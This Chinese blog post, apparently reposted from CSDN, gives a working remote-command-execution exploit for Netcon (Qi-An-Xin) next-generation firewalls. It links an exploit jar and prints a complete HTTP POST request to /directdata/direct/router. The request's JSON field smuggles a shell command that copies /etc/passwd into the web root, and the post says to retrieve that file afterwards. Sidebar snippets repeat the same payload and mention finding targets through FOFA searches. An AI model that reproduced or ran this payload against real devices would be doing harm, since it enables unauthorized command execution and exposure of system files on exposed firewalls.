网康科技-下一代防火墙 rce

最新推荐文章于 2024-03-17 11:48:06 发布
最新推荐文章于 2024-03-17 11:48:06 发布
阅读量414 收藏
点赞数
分类专栏: Web漏洞 文章标签: chrome 前端
原文链接:https://blog.csdn.net/wuguojiuai/article/details/117453493?spm=1001.2014.3001.5501
版权

目录

         漏洞利用

         POC

然后访问:/test_test.txt

web安全学习了解: web渗透测试            
官网: 宣紫科技       

 漏洞利用

利用jar包: https://github.com/Yang0615777/PocList/blob/main/QiAnXin-WangKangFirewall-RCE.jar

POC

POST /directdata/direct/router HTTP/1.1
Host: x.x.x.x
Connection: close
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://x.x.x.x/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=d6o8gdugrhmvf2sq18ojhj50p3; ys-active_page=s%3A
Content-Length: 178

{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;cat /etc/passwd >/var/www/html/test_test.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}

然后访问:/test_test.txt

宣紫科技
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网康下一代防火墙RCE漏洞
maverickpig的博客
05-26 1015
网络安全自学日志-漏洞复现篇:网康下一代防火墙RCE漏洞 使用需知 由于传播和使用本文所提供的任何直接或间接的后果和损失,均由用户承担,作者对此不承担任何责任。如果文章出现敏感内容产生不良影响,请联系作者删除。 一、漏洞描述 防火墙使用linux进行开发的,可以使用echo xxx >123.txt这样的方式写入文件。 当文件生成目录在网站根目录下就可以直接访问 二、漏洞影响 奇安信 网康下一代防火墙 三、漏洞复现 存在漏洞的路径为 POST /directdata/direct/router
网康防火墙前台RCE PoC及漏洞分析
weixin_50464560的博客
09-30 1677
漏洞描述 网康下一代防火墙(NGFW)是网康科技推出的一款可全面应对网络威胁的高性能应用层防火墙。凭借超强的应用识别能力,下一代防火墙可深入洞察网络流量中的用户、应用和内容,借助全新的高性能单路径异构并行处理引擎,在互联网出口、数据中心边界、应用服务前端等场景提供高效的应用层一体化安全防护,帮助用户安全地开展业务并降低安全成本。 这个洞是今年hvv期间爆出来的,危害很高,因此甲方baba要求我做一下分析的工作,好家伙,开局一个漏洞名称,报告内容全靠编,安排。 在网上找一条...
2021年HW0day-奇安信 网康下一代防火墙 RCE漏洞细节
weixin_45032957的博客
04-21 882
POC为POST 类型的HTTP 请求报文 POST /directdata/direct/router HTTP/1.1 Host: x.x.x.x Connection: close Cache-Control: max-age=0 sec-ch-ua: “Google Chrome”;v=“89”, “Chromium”;v=“89”, “;Not A Brand”;v=“99” sec-ch-ua-mobile: ?0 Upgrade-Insecure-Requests: 1 User-Agent:
网康NS-NGFW防火墙远程RCE 漏洞复现
00勇士王子的博客
04-11 1425
漏洞点在 /directdata/direct/router 先访问ip加上上面的路径 具体包如下: GET /directdata/direct/router HTTP/1.1 Host: 目标ip地址 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9.
x微E-Cology WorkflowServiceXml RCE1
08-03
x微E-Cology WorkflowServiceXml RCEx 微 E-Cology WorkflowServiceXml RCEx 微 E-Cology
CVE-2021-34473 Exchange RCE.MD
04-23
CVE-2021-34473 Exchange RCE
Apache-druid-kafka-rce.yaml
最新发布
04-30
kafka相关RCE漏洞poc,扫描器的yaml文件,可以导入yara扫描器进行授权漏洞渗透测试。
CVE-2021-26855 Exchange RCE.MD
04-23
CVE-2021-26855 Exchange RCE
Exploit-Nagios-XI-5.7.X_Remote-Code-Execution-RCE-Authenticated:Nagios XI 5.7.X-远程执行代码RCE(已认证)
04-10
利用Nagios-XI-5.7.X远程代码执行RCE身份验证 Nagios XI 5.7.X-远程执行代码RCE(已认证)
【复现】网康科技-防火墙存在RCE漏洞_17
fushuang333的博客
01-13 922
【复现】网康科技-防火墙存在RCE漏洞,网康下一代防火墙(NGFW)是一款可以全面应对应用层威胁的高性能防火墙
奇安信 网康下一代防火墙 RCE复现
weixin_43227251的博客
04-13 1781
奇安信 网康下一代防火墙 RCE 漏洞描述 奇安信 网康下一代防火墙存在远程命令执行,通过漏洞攻击者可以获取服务器权限 漏洞影响 奇安信 网康下一代防火墙 FOFA app=“网康科技-下一代防火墙” 漏洞复现 登录页面如下 发送如下请求包 POST /directdata/direct/router HTTP/1.1 Host: Connection: close Content-Length: 179 Cache-Control: max-age=0 sec-ch-ua: "Google Chrom
网康下一代防火墙远程命令执行漏洞复现
The current road is different, love needs to distinguish between right and wrong
11-18 166
简介: 奇安信网康下一代防火墙存在远程命令执行防火墙使用linux进行开发的,可以通过改漏洞获取服务器权限。 漏洞复现: fofa直接搜索: app="网康科技-下一代防火墙" 点进一个链接后是一个登录框页面 发送POST请求: #请求路径 /directdata/direct/router 页面返回空白,说明路径存在,可能存在漏洞。 此时抓包发送post poc数据: poc: {"action":"SSLVPN_Resource","method":"d.
网康下一代防火墙 命令执行
ranuy阮的博客
04-29 1223
网康下一代防火墙 命令执行 fofo搜索 漏洞路径 /directdata/direct/router 漏洞数据包 POST /directdata/direct/router HTTP/1.1 Host: 192.168.1.86 Connection: close Content-Length: 160 Upgrade-Insecure-Requests: 1 {"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/
Sophos 修复严重的防火墙 RCE 漏洞
smellycat000的专栏
03-28 1375
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士Sophos 修复了位于 Sophos 防火墙产品中的一个远程代码执行漏洞 (CVE-2022-1040)。该认证绕过漏洞位于 Sophos Firewall 的 User Portal 和 Webadmin区域。位于web管理控制台中的RCE上周五,Sophos 披露了影响 Sophos Firewall 版本 18....
一次绕过防火墙获取RCE以及提权到root权限的渗透过程
weixin_30667301的博客
05-03 543
本文是关于Apache struts2 CVE-2013-2251是由于导致执行远程命令的影响而被高度利用的漏洞。简而言之,通过操纵以“action:”/”redirect:”/”redirectAction:”为前缀的参数引入的漏洞,允许在使用<Struts 2.3.15作为框架的Java Web应用程序中执行远程命令。 现在,当这个漏洞以病毒式疯狂传播时,主要的应用防火墙...
网康NGFW下一代防火墙远程命令执行漏洞复现
qq_44005305的博客
02-24 632
2021HW期间,北京网康科技有限公司网康NGFW下一代防火墙被爆出远程命令执行漏洞。CNVD上还没查到漏洞编号,应该是CNVD还未公开该漏洞。但是网上已有人复现和漏洞分析的文章。网康下一代防火墙(NGFW)是网康科技推出的一款可全面应对网络威胁的高性能应用层防火墙。但该NGFW存在远程命令执行漏洞,攻击者可通过构造特殊请求执行系统命令
网康应用安全网关NS-ASG-index-RCE
qq_39342001的博客
03-17 228
【代码】网康应用安全网关NS-ASG-index-RCE
HTTP 协议
YZG ' BLOG
01-21 2901
一、什么是协议? 协议就是一套规范,一套协议。由其他人或者其他组织制定。 二、什么是HTTP 协议? HTTP 协议 W3C(世界万维网联盟) 制定的超文本传输协议. 超文本:不仅仅是普通的文本,可以传输声音,视频,图片,等等。。。 这种协议存在 B 和 S 之间,B向S 发送数据要遵守HTTP 协议,S 向B 发送数据同样也需要 HTTP 协议。 B/S 表示:浏览器 访问 WEB 系统。 浏览器 向 WEB 系统发送数据,叫做 请求。 WEB 服务器 向 浏览器发送数据 叫做 响应..
poc-yaml-thinkphp5023-method-rce poc1
07-29
poc-yaml-thinkphp5023-method-rce poc1 是一种潜在的安全漏洞利用程序,利用该程序可以对使用 ThinkPHP 5.0.23 版本的应用进行远程代码执行攻击。 ThinkPHP 是一款常用的 PHP 框架,版本 5.0.23 存在一个命令行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值